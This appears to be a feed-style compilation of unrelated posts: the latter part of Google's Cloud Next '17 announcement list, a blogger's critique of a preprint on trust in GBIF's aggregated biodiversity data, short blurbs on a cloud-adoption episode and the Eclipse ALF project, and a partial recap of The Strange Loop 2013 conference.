2. AppBridge - Google Cloud acquired Vancouver-based AppBridge this week, which helps you migrate data from on-prem file servers into G Suite and Google Drive.

100-announcements-4

Google Cloud brings a suite of new security features to Google Cloud Platform and G Suite designed to help safeguard your company’s assets and prevent disruption to your business: 

3. Identity-Aware Proxy (IAP) for Google Cloud Platform (Beta) - Identity-Aware Proxy lets you provide access to applications based on risk, rather than using a VPN. It provides secure application access from anywhere, restricts access by user, identity and group, deploys with integrated phishing resistant Security Key and is easier to setup than end-user VPN.

4. Data Loss Prevention (DLP) for Google Cloud Platform (Beta) - Data Loss Prevention API lets you scan data for 40+ sensitive data types, and is used as part of DLP in Gmail and Drive. You can find and redact sensitive data stored in GCP, invigorate old applications with new sensitive data sensing “smarts” and use predefined detectors as well as customize your own.

5. Key Management Service (KMS) for Google Cloud Platform (GA) - Key Management Service allows you to generate, use, rotate, and destroy symmetric encryption keys for use in the cloud.

6. Security Key Enforcement (SKE) for Google Cloud Platform (GA) - Security Key Enforcement allows you to require security keys be used as the 2-Step verification factor for enhanced anti-phishing security whenever a GCP application is accessed.

7. Vault for Google Drive (GA) - Google Vault is the eDiscovery and archiving solution for G Suite. Vault enables admins to easily manage their G Suite data lifecycle and search, preview and export the G Suite data in their domain. Vault for Drive enables full support for Google Drive content, including Team Drive files.

8. Google-designed security chip, Titan - Google uses Titan to establish hardware root of trust, allowing us to securely identify and authenticate legitimate access at the hardware level. Titan includes a hardware random number generator, performs cryptographic operations in the isolated memory, and has a dedicated secure processor (on-chip).

100-announcements-7

New GCP data analytics products and services help organizations solve business problems with data, rather than spending time and resources building, integrating and managing the underlying infrastructure:

9. BigQuery Data Transfer Service (Private Beta) - BigQuery Data Transfer Service makes it easy for users to quickly get value from all their Google-managed advertising datasets. With just a few clicks, marketing analysts can schedule data imports from Google Adwords, DoubleClick Campaign Manager, DoubleClick for Publishers and YouTube Content and Channel Owner reports.

10. Cloud Dataprep (Private Beta) - Cloud Dataprep is a new managed data service, built in collaboration with Trifacta, that makes it faster and easier for BigQuery end-users to visually explore and prepare data for analysis without the need for dedicated data engineer resources.

11. New Commercial Datasets - Businesses often look for datasets (public or commercial) outside their organizational boundaries. Commercial datasets offered include financial market data from Xignite, residential real-estate valuations (historical and projected) from HouseCanary, predictions for when a house will go on sale from Remine, historical weather data from AccuWeather, and news archives from Dow Jones, all immediately ready for use in BigQuery (with more to come as new partners join the program).

12. Python for Google Cloud Dataflow in GA - Cloud Dataflow is a fully managed data processing service supporting both batch and stream execution of pipelines. Until recently, these benefits have been available solely to Java developers. Now there’s a Python SDK for Cloud Dataflow in GA.

13. Stackdriver Monitoring for Cloud Dataflow (Beta) - We’ve integrated Cloud Dataflow with Stackdriver Monitoring so that you can access and analyze Cloud Dataflow job metrics and create alerts for specific Dataflow job conditions.

14. Google Cloud Datalab in GA - This interactive data science workflow tool makes it easy to do iterative model and data analysis in a Jupyter notebook-based environment using standard SQL, Python and shell commands.

15. Cloud Dataproc updates - Our fully managed service for running Apache Spark, Flink and Hadoop pipelines has new support for restarting failed jobs (including automatic restart as needed) in beta, the ability to create single-node clusters for lightweight sandbox development, in beta, GPU support, and the cloud labels feature, for more flexibility managing your Dataproc resources, is now GA.

100-announcements-9

New GCP databases and database features round out a platform on which developers can build great applications across a spectrum of use cases:

16. Cloud SQL for Postgre SQL (Beta) - Cloud SQL for PostgreSQL implements the same design principles currently reflected in Cloud SQL for MySQL, namely, the ability to securely store and connect to your relational data via open standards.

17. Microsoft SQL Server Enterprise (GA) - Available on Google Compute Engine, plus support for Windows Server Failover Clustering (WSFC) and SQL Server AlwaysOn Availability (GA).

18. Cloud SQL for MySQL improvements - Increased performance for demanding workloads via 32-core instances with up to 208GB of RAM, and central management of resources via Identity and Access Management (IAM) controls.

19. Cloud Spanner - Launched a month ago, but still, it would be remiss not to mention it because, hello, it’s Cloud Spanner! The industry’s first horizontally scalable, globally consistent, relational database service.

20. SSD persistent-disk performance improvements - SSD persistent disks now have increased throughput and IOPS performance, which are particularly beneficial for database and analytics workloads. Read these docs for complete details about persistent-disk performance.

21. Federated query on Cloud Bigtable - We’ve extended BigQuery’s reach to query data inside Cloud Bigtable, the NoSQL database service for massive analytic or operational workloads that require low latency and high throughput (particularly common in Financial Services and IoT use cases).

100-announcements-11

New GCP Cloud Machine Learning services bolster our efforts to make machine learning accessible to organizations of all sizes and sophistication:

22.  Cloud Machine Learning Engine (GA) - Cloud ML Engine, now generally available, is for organizations that want to train and deploy their own models into production in the cloud.

23. Cloud Video Intelligence API (Private Beta) - A first of its kind, Cloud Video Intelligence API lets developers easily search and discover video content by providing information about entities (nouns such as “dog,” “flower”, or “human” or verbs such as “run,” “swim,” or “fly”) inside video content.

24. Cloud Vision API (GA) - Cloud Vision API reaches GA and offers new capabilities for enterprises and partners to classify a more diverse set of images. The API can now recognize millions of entities from Google’s Knowledge Graph and offers enhanced OCR capabilities that can extract text from scans of text-heavy documents such as legal contracts or research papers or books.

25. Machine learning Advanced Solution Lab (ASL) - ASL provides dedicated facilities for our customers to directly collaborate with Google’s machine-learning experts to apply ML to their most pressing challenges.

26. Cloud Jobs API - A powerful aid to job search and discovery, Cloud Jobs API now has new features such as Commute Search, which will return relevant jobs based on desired commute time and preferred mode of transportation.

27. Machine Learning Startup Competition - We announced a Machine Learning Startup Competition in collaboration with venture capital firms Data Collective and Emergence Capital, and with additional support from a16z, Greylock Partners, GV, Kleiner Perkins Caufield & Byers and Sequoia Capital.

100-announcements-10

New GCP pricing continues our intention to create customer-friendly pricing that’s as smart as our products; and support services that are geared towards meeting our customers where they are:

28. Compute Engine price cuts - Continuing our history of pricing leadership, we’ve cut Google Compute Engine prices by up to 8%.

29. Committed Use Discounts - With Committed Use Discounts, customers can receive a discount of up to 57% off our list price, in exchange for a one or three year purchase commitment paid monthly, with no upfront costs.

30. Free trial extended to 12 months - We’ve extended our free trial from 60 days to 12 months, allowing you to use your $300 credit across all GCP services and APIs, at your own pace and schedule. Plus, we’re introduced new Always Free products -- non-expiring usage limits that you can use to test and develop applications at no cost. Visit the Google Cloud Platform Free Tier page for details.

31. Engineering Support - Our new Engineering Support offering is a role-based subscription model that allows us to match engineer to engineer, to meet you where your business is, no matter what stage of development you’re in. It has 3 tiers:

  • Development engineering support - ideal for developers or QA engineers that can manage with a response within four to eight business hours, priced at $100/user per month.
  • Production engineering support provides a one-hour response time for critical issues at $250/user per month.
  • On-call engineering support pages a Google engineer and delivers a 15-minute response time 24x7 for critical issues at $1,500/user per month.

32. Cloud.google.com/community site - Google Cloud Platform Community is a new site to learn, connect and share with other people like you, who are interested in GCP. You can follow along with tutorials or submit one yourself, find meetups in your area, and learn about community resources for GCP support, open source projects and more.

100-announcements-8

New GCP developer platforms and tools reinforce our commitment to openness and choice and giving you what you need to move fast and focus on great code.

33. Google AppEngine Flex (GA) - We announced a major expansion of our popular App Engine platform to new developer communities that emphasizes openness, developer choice, and application portability.

34. Cloud Functions (Beta) - Google Cloud Functions has launched into public beta. It is a serverless environment for creating event-driven applications and microservices, letting you build and connect cloud services with code.

35. Firebase integration with GCP (GA) - Firebase Storage is now Google Cloud Storage for Firebase and adds support for multiple buckets, support for linking to existing buckets, and integrates with Google Cloud Functions.

36. Cloud Container Builder - Cloud Container Builder is a standalone tool that lets you build your Docker containers on GCP regardless of deployment environment. It’s a fast, reliable, and consistent way to package your software into containers as part of an automated workflow.

37. Community Tutorials (Beta)  - With community tutorials, anyone can now submit or request a technical how-to for Google Cloud Platform.

100-announcements-9

Secure, global and high-performance, we’ve built our cloud for the long haul. This week we announced a slew of new infrastructure updates. 

38. New data center region: California - This new GCP region delivers lower latency for customers on the West Coast of the U.S. and adjacent geographic areas. Like other Google Cloud regions, it will feature a minimum of three zones, benefit from Google’s global, private fibre network, and offer a complement of GCP services.

39. New data center region: Montreal - This new GCP region delivers lower latency for customers in Canada and adjacent geographic areas. Like other Google Cloud regions, it will feature a minimum of three zones, benefit from Google’s global, private fibre network, and offer a complement of GCP services.

40. New data center region: Netherlands - This new GCP region delivers lower latency for customers in Western Europe and adjacent geographic areas. Like other Google Cloud regions, it will feature a minimum of three zones, benefit from Google’s global, private fibre network, and offer a complement of GCP services.

41. Google Container Engine - Managed Nodes - Google Container Engine (GKE) has added Automated Monitoring and Repair of your GKE nodes, letting you focus on your applications while Google ensures your cluster is available and up-to-date.

42. 64 Core machines + more memory - We have doubled the number of vCPUs you can run in an instance from 32 to 64 and up to 416GB of memory per instance.

43. Internal Load balancing (GA) - Internal Load Balancing, now GA, lets you run and scale your services behind a private load balancing IP address which is accessible only to your internal instances, not the internet.

44. Cross-Project Networking (Beta) - Cross-Project Networking (XPN), now in beta, is a virtual network that provides a common network across several Google Cloud Platform projects, enabling simple multi-tenant deployments.

100-announcements-16

In the past year, we’ve launched 300+ features and updates for G Suite and this week we announced our next generation of collaboration and communication tools.

45. Team Drives (GA for G Suite Business, Education and Enterprise customers) - Team Drives help teams simply and securely manage permissions, ownership and file access for an organization within Google Drive.

46. Drive File Stream (EAP) - Drive File Stream is a way to quickly stream files directly from the cloud to your computer With Drive File Steam, company data can be accessed directly from your laptop, even if you don’t have much space on your hard drive.

47. Google Vault for Drive (GA for G Suite Business, Education and Enterprise customers) - Google Vault for Drive now gives admins the governance controls they need to manage and secure all of their files, including employee Drives and Team Drives. Google Vault for Drive also lets admins set retention policies that automatically keep what’s needed and delete what’s not.

48. Quick Access in Team Drives (GA) - powered by Google’s machine intelligence, Quick Access helps to surface the right information for employees at the right time within Google Drive. Quick Access now works with Team Drives on iOS and Android devices, and is coming soon to the web.

49. Hangouts Meet (GA to existing customers) - Hangouts Meet is a new video meeting experience built on the Hangouts that can run 30-person video conferences without accounts, plugins or downloads. For G Suite Enterprise customers, each call comes with a dedicated dial-in phone number so that team members on the road can join meetings without wifi or data issues.

50. Hangouts Chat (EAP) - Hangouts Chat is an intelligent communication app in Hangouts with dedicated, virtual rooms that connect cross-functional enterprise teams. Hangouts Chat integrates with G Suite apps like Drive and Docs, as well as photos, videos and other third-party enterprise apps.

51. @meet - @meet is an intelligent bot built on top of the Hangouts platform that uses natural language processing and machine learning to automatically schedule meetings for your team with Hangouts Meet and Google Calendar.

52. Gmail Add-ons for G Suite (Developer Preview) - Gmail Add-ons provide a way to surface the functionality of your app or service directly in Gmail. With Add-ons, developers only build their integration once, and it runs natively in Gmail on web, Android and iOS.

53. Edit Opportunities in Google Sheets - with Edit Opportunities in Google Sheets, sales reps can sync a Salesforce Opportunity List View to Sheets to bulk edit data and changes are synced automatically to Salesforce, no upload required.

54. Jamboard - Our whiteboard in the cloud goes GA in May! Jamboard merges the worlds of physical and digital creativity. It’s real time collaboration on a brilliant scale, whether your team is together in the conference room or spread all over the world.

100-announcements-17

Building on the momentum from a growing number of businesses using Chrome digital signage and kiosks, we added new management tools and APIs in addition to introducing support for Android Kiosk apps on supported Chrome devices. 

55. Android Kiosk Apps for Chrome - Android Kiosk for Chrome lets users manage and deploy Chrome digital signage and kiosks for both web and Android apps. And with Public Session Kiosks, IT admins can now add a number of Chrome packaged apps alongside hosted apps.

56. Chrome Kiosk Management Free trial - This free trial gives customers an easy way to test out Chrome for signage and kiosk deployments.

57. Chrome Device Management (CDM) APIs for Kiosks - These APIs offer programmatic access to various Kiosk policies. IT admins can schedule a device reboot through the new APIs and integrate that functionality directly in a third- party console.

58. Chrome Stability API - This new API allows Kiosk app developers to improve the reliability of the application and the system.

100-announcements-2

Attendees at Google Cloud Next ‘17 heard stories from many of our valued customers:

59. Colgate - Colgate-Palmolive partnered with Google Cloud and SAP to bring thousands of employees together through G Suite collaboration and productivity tools. The company deployed G Suite to 28,000 employees in less than six months.

60. Disney Consumer Products & Interactive (DCPI) - DCPI is on target to migrate out of its legacy infrastructure this year, and is leveraging machine learning to power next generation guest experiences.

61. eBay - eBay uses Google Cloud technologies including Google Container Engine, Machine Learning and AI for its ShopBot, a personal shopping bot on Facebook Messenger.

62. HSBC - HSBC is one of the world's largest financial and banking institutions and making a large investment in transforming its global IT. The company is working closely with Google to deploy Cloud DataFlow, BigQuery and other data services to power critical proof of concept projects.

63. LUSH - LUSH migrated its global e-commerce site from AWS to GCP in less than six weeks, significantly improving the reliability and stability of its site. LUSH benefits from GCP’s ability to scale as transaction volume surges, which is critical for a retail business. In addition, Google's commitment to renewable energy sources aligns with LUSH's ethical principles.

64. Oden Technologies - Oden was part of Google Cloud’s startup program, and switched its entire platform to GCP from AWS. GCP offers Oden the ability to reliably scale while keeping costs low, perform under heavy loads and consistently delivers sophisticated features including machine learning and data analytics.

65. Planet - Planet migrated to GCP in February, looking to accelerate their workloads and leverage Google Cloud for several key advantages: price stability and predictability, custom instances, first-class Kubernetes support, and Machine Learning technology. Planet also announced the beta release of their Explorer platform.

66. Schlumberger - Schlumberger is making a critical investment in the cloud, turning to GCP to enable high-performance computing, remote visualization and development velocity. GCP is helping Schlumberger deliver innovative products and services to its customers by using HPC to scale data processing, workflow and advanced algorithms.

67. The Home Depot - The Home Depot collaborated with GCP’s Customer Reliability Engineering team to migrate HomeDepot.com to the cloud in time for Black Friday and Cyber Monday. Moving to GCP has allowed the company to better manage huge traffic spikes at peak shopping times throughout the year.

68. Verizon - Verizon is deploying G Suite to more than 150,000 of its employees, allowing for collaboration and flexibility in the workplace while maintaining security and compliance standards. Verizon and Google Cloud have been working together for more than a year to bring simple and secure productivity solutions to Verizon’s workforce.

100-announcements-3

We brought together Google Cloud partners from our growing ecosystem across G Suite, GCP, Maps, Devices and Education. Our partnering philosophy is driven by a set of principles that emphasize openness, innovation, fairness, transparency and shared success in the cloud market. Here are some of our partners who were out in force at the show:

69. Accenture - Accenture announced that it has designed a mobility solution for Rentokil, a global pest control company, built in collaboration with Google as part of the partnership announced at Horizon in September.

70. Alooma - Alooma announced the integration of the Alooma service with Google Cloud SQL and BigQuery.

71. Authorized Training Partner Program - To help companies scale their training offerings more quickly, and to enable Google to add other training partners to the ecosystem, we are introducing a new track within our partner program to support their unique offerings and needs.

72. Check Point - Check Point® Software Technologies announced Check Point vSEC for Google Cloud Platform, delivering advanced security integrated with GCP as well as their joining of the Google Cloud Technology Partner Program.

73. CloudEndure - We’re collaborating with CloudEndure to offer a no cost, self-service migration tool for Google Cloud Platform (GCP) customers.

74. Coursera - Coursera announced that it is collaborating with Google Cloud Platform to provide an extensive range of Google Cloud training course. To celebrate this announcement  Coursera is offering all NEXT attendees a 100% discount for the GCP fundamentals class.

75. DocuSign - DocuSign announced deeper integrations with Google Docs.

76. Egnyte - Egnyte announced an enhanced integration with Google Docs that will allow our joint customers to create, edit, and store Google Docs, Sheets and Slides files right from within the Egnyte Connect.

77. Google Cloud Global Partner Awards - We recognized 12 Google Cloud partners that demonstrated strong customer success and solution innovation over the past year: Accenture, Pivotal, LumApps, Slack, Looker, Palo Alto Networks, Virtru, SoftBank, DoIT, Snowdrop Solutions, CDW Corporation, and SYNNEX Corporation.

78. iCharts - iCharts announced additional support for several GCP databases, free pivot tables for current Google BigQuery users, and a new product dubbed “iCharts for SaaS.”

79. Intel - In addition to the progress with Skylake, Intel and Google Cloud launched several technology initiatives and market education efforts covering IoT, Kubernetes and TensorFlow, including optimizations, a developer program and tool kits.

80. Intuit - Intuit announced Gmail Add-Ons, which are designed to integrate custom workflows into Gmail based on the context of a given email.

81. Liftigniter - Liftigniter is a member of Google Cloud’s startup program and focused on machine learning personalization using predictive analytics to improve CTR on web and in-app.

82. Looker - Looker launched a suite of Looker Blocks, compatible with Google BigQuery Data Transfer Service, designed to give marketers the tools to enhance analysis of their critical data.

83. Low interest loans for partners - To help Premier Partners grow their teams, Google announced that capital investment are available to qualified partners in the form of low interest loans.

84. MicroStrategy - MicroStrategy announced an integration with Google Cloud SQL for PostgreSQL and Google Cloud SQL for MySQL.

85. New incentives to accelerate partner growth - We are increasing our investments in multiple existing and new incentive programs; including, low interest loans to help Premier Partners grow their teams, increasing co-funding to accelerate deals, and expanding our rebate programs.

86. Orbitera Test Drives for GCP Partners - Test Drives allow customers to try partners’ software and generate high quality leads that can be passed directly to the partners’ sales teams. Google is offering Premier Cloud Partners one year of free Test Drives on Orbitera.

87. Partner specializations - Partners demonstrating strong customer success and technical proficiency in certain solution areas will now qualify to apply for a specialization. We’re launching specializations in application development, data analytics, machine learning and infrastructure.

88. Pivotal - GCP announced Pivotal as our first CRE technology partner. CRE technology partners will work hand-in-hand with Google to thoroughly review their solutions and implement changes to address identified risks to reliability.

89. ProsperWorks - ProsperWorks announced Gmail Add-Ons, which are designed to integrate custom workflows into Gmail based on the context of a given email.

90. Qwiklabs - This recent acquisition will provide Authorized Training Partners the ability to offer hands-on labs and comprehensive courses developed by Google experts to our customers.

91. Rackspace - Rackspace announced a strategic relationship with Google Cloud to become its first managed services support partner for GCP, with plans to collaborate on a new managed services offering for GCP customers set to launch later this year.

92. Rocket.Chat - Rocket.Chat, a member of Google Cloud’s startup program, is adding a number of new product integrations with GCP including Autotranslate via Translate API, integration with Vision API to screen for inappropriate content, integration to NLP API to perform sentiment analysis on public channels, integration with GSuite for authentication and a full move of back-end storage to Google Cloud Storage.

93. Salesforce - Salesforce announced Gmail Add-Ons, which are designed to integrate custom workflows into Gmail based on the context of a given email.

94. SAP - This strategic partnership includes certification of SAP HANA on GCP, new G Suite integrations and future collaboration on building machine learning features into intelligent applications like conversational apps that guide users through complex workflows and transactions.

95. Smyte - Smyte participated in the Google Cloud startup program and protects millions of actions a day on websites and mobile applications. Smyte recently moved from self-hosted Kubernetes to Google Container Engine (GKE).

96. Veritas - Veritas expanded its partnership with Google Cloud to provide joint customers with 360 Data Management capabilities. The partnership will help reduce data storage costs, increase compliance and eDiscovery readiness and accelerate the customer’s journey to Google Cloud Platform.

97. VMware Airwatch - Airwatch provides enterprise mobility management solutions for Android and continues to drive the Google Device ecosystem to enterprise customers.

98. Windows Partner Program- We’re working with top systems integrators in the Windows community to help GCP customers take full advantage of Windows and .NET apps and services on our platform.

99. Xplenty - Xplenty announced the addition of two new services from Google Cloud into their available integrations: Google Cloud Spanner and Google Cloud SQL for PostgreSQL.

100. Zoomdata - Zoomdata announced support for Google’s Cloud Spanner and PostgreSQL on GCP, as well as enhancements to the existing Zoomdata Smart Connector for Google BigQuery. With these new capabilities Zoomdata offers deeply integrated and optimized support for Google Cloud Platform’s Cloud Spanner, PostgreSQL, Google BigQuery, and Cloud DataProc services.

We’re thrilled to have so many new products and partners that can help all of our customers grow. And as our final announcement for Google Cloud Next ’17 — please save the date for Next 2018: June 4–6 in San Francisco.

I guess that makes it 101. :-)



          Response to To Increase Trust, Change the Social Design Behind Aggregated Biodiversity Data        

Nico Franz and Beckett W. Sterner recently published a preprint entitled "To Increase Trust, Change the Social Design Behind Aggregated Biodiversity Data" on bioRxiv http://dx.doi.org/10.1101/157214 Below is the abstract:

Growing concerns about the quality of aggregated biodiversity data are lowering trust in large-scale data networks. Aggregators frequently respond to quality concerns by recommending that biologists work with original data providers to correct errors "at the source". We show that this strategy falls systematically short of a full diagnosis of the underlying causes of distrust. In particular, trust in an aggregator is not just a feature of the data signal quality provided by the aggregator, but also a consequence of the social design of the aggregation process and the resulting power balance between data contributors and aggregators. The latter have created an accountability gap by downplaying the authorship and significance of the taxonomic hierarchies ≠ frequently called "backbones" ≠ they generate, and which are in effect novel classification theories that operate at the core of data-structuring process. The Darwin Core standard for sharing occurrence records plays an underappreciated role in maintaining the accountability gap, because this standard lacks the syntactic structure needed to preserve the taxonomic coherence of data packages submitted for aggregation, leading to inferences that no individual source would support. Since high-quality data packages can mirror competing and conflicting classifications, i.e., unsettled systematic research, this plurality must be accommodated in the design of biodiversity data integration. Looking forward, a key directive is to develop new technical pathways and social incentives for experts to contribute directly to the validation of taxonomically coherent data packages as part of a greater, trustworthy aggregation process.

Below I respond to some specific points that annoyed me about this article, at the end I try and sketch out a more constructive response. Let me stress that although I am the current Chair of the GBIF Science Committee, the views expressed here are entirely my own.

Trust and social relations

Trust is a complex and context-sensitive concept...First, trust is a dependence relation between a person or organization and another person or organization. The first agent depends on the second one to do something important for it. An individual molecular phylogeneticist, for example, may rely on GenBank (Clark et al. 2016) to maintain an up-to-date collection of DNA sequences, because developing such a resource on her own would be cost prohibitive and redundant. Second, a relation of dependence is elevated to being one of trust when the first agent cannot control or validate the second agent's actions. This might be because the first agent lacks the knowledge or skills to perform the relevant task, or because it would be too costly to check.

Trust is indeed complex. I found this part of the article to be fascinating, but incomplete. The social network GBIF operates in is much larger than simply taxonomic experts and GBIF, there are relationships with data providers, other initiatives, a broad user community, government agencies that approve it's continued funding, and so on. Some of the decisions GBIF makes need to be seen in this broader context.

For example, the article challenges GBIF for responding to errors in the data by saying that these should be "corrected at source". This a political statement, given that data providers are anxious not to ceed complete control of their data to aggregators. Hence the model that GBIF users see errors, those errors get passed back to source (the mechanisms for tis is mostly non-existent), the source fixes it, then the aggregator re-harvests. This model makes assumptions about whether sources are either willing or able to fix these errors that I think are not really true. But the point is this is less about not taking responsibility, but instead avoiding treading on toes by taking too much responsibility. Personally I think should take responsibility for fixing a lot of these errors, because it is GBIF whose reputation suffers (as demonstrated by Franz and Sterner's article).

Scalability

A third step is to refrain from defending backbones as the only pragmatic option for aggregators (Franz 2016). The default argument points to the vast scale of global aggregation while suggesting that only backbones can operate at that scale now. The argument appears valid on the surface, i.e., the scale is immense and resources are limited. Yet using scale as an obstacle it is only effective if experts were immediately (and unreasonably) demanding a fully functional, all data-encompassing alternative. If on the other hand experts are looking for token actions towards changing the social model, then an aggregator's pursuit of smaller-scale solutions is more important than succeeding with the 'moonshot'.

Scalability is everything. GBIF is heading towards a billion occurrence records and several million taxa (particularly as more and more taxa from DNA-barcoding taxa are added). I'm not saying that tractability trounces trust, but it is a major consideration. Anybody advocating a change has got to think about how these changes will work at scale.

I'm conscious that this argument could easily be used to swat away any suggestion ("nice idea, but won't scale") and hence be a reason to avoid change. I myself often wish GBIF would do things differently, and run into this problem. One way around it is to make use of the fact that GBIF has some really good APIs, so if you want GBIF to do something different you can build a proof of concept to show what could be done. If that is sufficiently compelling, then the case for trying to scale it up is going to be much easier to make.

Multiple classifications

As a social model, the notion of backbones (Bisby 2000) was misguided from the beginning. They disenfranchise systematists who are by necessity consensus-breakers, and distort the coherence of biodiversity data packages that reflect regionally endorsed taxonomic views. Henceforth, backbone-based designs should be regarded as an impediment to trustworthy aggregation, to be replaced as quickly and comprehensively as possible. We realize that just saying this will not make backbones disappear. However, accepting this conclusion counts as a step towards regaining accountability.

This strikes me as hyperbole. "They disenfranchise systematists who are by necessity consensus-breakers". Really? Having backbones in no way prevents people doing systematic research, challenging existing classifications, or developing new ones (which, if they are any good, will become the new consensus).

We suggest that aggregators must either author these classification theories in the same ways that experts author systematic monographs, or stop generating and imposing them onto incoming data sources. The former strategy is likely more viable in the short term, but the latter is the best long-term model for accrediting individual expert contributions. Instead of creating hierarchies they would rather not 'own' anyway, aggregators would merely provide services and incentives for ingesting, citing, and aligning expert-sourced taxonomies (Franz et al. 2016a).

Backbones are authored in the sense that they are the product of people and code. GBIF's is pretty transparent (code and some data on github, complete with a list of problems). Playing Devil's advocate, maybe the problem here is the notion of authorship. If you read a paper with 100's of authors, why does that give you any greater sense of accountabily? Is each author going to accept responsibility for (or being to talk cogently about) every aspect of that paper? If aggregators such as GBIF and Genbank didn't provide a single, simple way to taxonomically browse the data I'd expect it would be the first thing users would complain about. There are multiple communities GBIF must support, including users who care not at all about the details of classification and phylogeny.

Having said that, obviously these backbone classifications are often problematic and typically lag behind current phylogenetic research. And I accept that they can impose a certain view on how you can query data. GenBank for a long time did not recognise the Ecdysozoa (nematodes plus arthropods) despite the evidence for that group being almost entirely molecular. Some of my research has been inspired by the problem of customising a backbone classification to better more modern views (doi:10.1186/1471-2105-6-208).

If handling multiple classifications is an obstacle to people using or contributing data to GBIF, then that is clearly something that deserves attention. I'm a little sceptical, in that I think this is similar to the issue of being able to look at multiple versions of a document or GenBank sequence. Everyone says it's important to have, I suspect very few people ever use that functionality. But a way forward might be to construct a meaningful example (in other words an live demo, not a diagram with a few plant varieties).

Ways forward

We view this diagnosis as a call to action for both the systematics and the aggregator communities to reengage with each other. For instance, the leadership constellation and informatics research agenda of entities such as GBIF or Biodiversity Information Standards (TDWG 2017) should strongly coincide with the mission to promote early-stage systematist careers. That this is not the case now is unfortunate for aggregators, who are thereby losing credibility. It is also a failure of the systematics community to advocate effectively for its role in the biodiversity informatics domain. Shifting the power balance back to experts is therefore a shared interest.

Having vented, let me step back a little and try and extract what I think the key issue is here. Issues such as error correction, backbones, multiple classifications are important, but I guess the real issue here is the relationship between experts such as taxonomists and systematists, and large-scale aggregators (note that GBIF serves a community that is bigger than just these researchers). Franz and Sterner write:

...aggregators also systematically compromise established conventions of sharing and recognizing taxonomic work. Taxonomic experts play a critical role in licensing the formation of high-quality biodiversity data packages. Systems of accountability that undermine or downplay this role are bound to lower both expert participation and trust in the aggregation process.

I think this is perhaps the key point. Currently aggregation tends to aggregate data and not provenance. Pretty much every taxonomic name has at one point or other been published by somebody. For various reasons (including the crappy way most nomenclature databases cite the scientific literature) by the time these names are assembled into a classification by GBIF the names have virtually no connection to the primary literature, which also means that who contributed the research that led to that name being minted (and the research itself) is lost. Arguably GBIF is missing an opportunity to make taxonomic and phylogenetic research more visible and discoverable (I'd argue this is a better approach than Quixotic efforts to get all biologists to always cite the primary taxonomic literature).

Franz and Sterner's article is a well-argued and sophisticated assessment of a relationship that isn't working the way it could. But to talk in terms of "power balance" strikes me as miscasting the debate. Would it not be better to try and think about aligning goals (assuming that is possible). What do experts want to achieve? What do they need to achieve those goals? Is it things such as access to specimens, data, literature, sequences? Visibility for their research? Demonstrable impact? Credit? What are the impediments? What, if anything, can GBIF and other aggregators do to help? In what way can facilitating the work of experts help GBIF?

In my own "early-stage systematist career" I had a conversation with Mark Hafner about the Louisiana State University Museum providing tissue samples for molecular sequencing, essentially a "project in a box". Although Mark was complaining about the lack credit for this (a familiar theme) the thing which struck me was how wonderful it would be to have such a service - here's everything you need to do your work, go do some science. What if GBIF could do the same? Are you interested in this taxonomic group, well here's the complete sum of what we know so far. Specimens, literature, DNA sequences, taxonomic names, the works. Wouldn't that be useful?

Franz and Sterner call for "both the systematics and the aggregator communities to reengage with each other". I would echo this. I think that the sometimes dysfunctional relationship between experts and aggregators is partly due to the failure to build a community of researchers around GBIF and its activities. The focus of GBIF's relationship with the scientific community has been to have a committee of advisers, which is a rather traditional and limited approach ("you're a scientist, tell us what scientists want"). It might be better served if it provided a forum for researchers to interact with GBIF, data providers, and each other.

I stated this blog (iPhylo) years ago to vent my frustrations about TreeBASE. At the time I was fond of a quote from a philosopher of science that I was reading, to the effect that we only criticise those things that we care about. I take Franz and Sterner's article to indicate that they care about GBIF quite a bit ;). I'm looking forward to more critical discussion about how we can reconcile the needs of experts and aggregators as we seek to make global biodiversity data both open and useful.


          EPISODE82 - You (are) the change agent for driving cloud adoption in your b        
Join us to explore practical strategies to overcome cloud adoption challenges faced by traditional businesses. We will discuss planning a cloud proof of concept (PoC), cloud native application development, where to start with DevOps, and why hybrid cloud is the winning formula. Come find out how we'll equip you with a pragmatic approach towards starting your cloud journey - one step at a time.
          Eclipse Foundation announces expanded support for Eclipse Integration Platform        
Eclipse Foundation announced today new partnerships that strengthen the Eclipse Application Lifecycle Framework (ALF) Project and has made available for download of the new proof of concept code which will demo at EclipseCon 2006. The ALF Project, initiated by Serena Software in the spring of 2005, addresses the universal problem of integrating Application Lifecycle Management (ALM) technologies so that they provide full interoperability. Currently more than thirty vendors have pledged support for the ALF project and momentum continues. Recent additions to the list of those committing resources include AccuRev, PlanView and Viewtier.
          The Strange Loop 2013        

This was my second time at The Strange Loop. When I attended in 2011, I said that it was one of the best conferences I had ever attended, and I was disappointed that family plans meant I couldn't attend in 2012. That meant my expectations were high. The main hotel for the event was the beautiful DoubleTree Union Station, an historic castle-like building that was once an ornate train station. The conference itself was a short walk away at the Peabody Opera House. Alex Miller, organizer of The Strange Loop, Clojure/West, and Lambda Jam (new this year), likes to use interesting venues, to make the conferences extra special.

I'm providing a brief summary here of what sessions I attended, followed by some general commentary about the event. As I said last time, if you can only attend one conference a year, this should be the one.

  • Jenny Finkel - Machine Learning for Relevance and Serendipity. The conference kicked off with a keynote from one of Prismatic's engineering team talking about how they use machine learning to discover news and articles that you will want to read. She did a great job of explaining the concepts and outlining the machinery, along with some of the interesting problems they encountered and solved.
  • Maxime Chevalier-Boisvert - Fast and Dynamic. Maxime took us on a tour of dynamic programming languages through history and showed how many of the innovations from earlier languages are now staples of modern dynamic languages. One slide presented JavaScript's take on n + 1 for various interesting values of n, showing the stranger side of dynamic typing - a "WAT?" moment.
  • Matthias Broecheler - Graph Computing at Scale. Matthias opened his talk with an interesting exercise of asking the audience two fairly simple questions, as a way of illustrating the sort of problems we're good at solving (associative network based knowledge) and not so good at solving (a simple bit of math and history). He pointed out the hard question for us was a simple one for SQL, but the easy question for us would be a four-way join in SQL. Then he introduced graph databases and showed how associative network based questions can be easily answered and started to go deeper into how to achieve high performance at scale with such databases. His company produces Titan, a high scale, distributed graph database.
  • Over lunch, two students from Colombia told us about the Rails Girls initiative, designed to encourage more young women into the field of technology. This was the first conference they had presented at and English was not their native language so it must have been very nerve-wracking to stand up in front of 1,100 people - mostly straight white males - and get their message across. I'll have a bit more to say about this topic at the end.
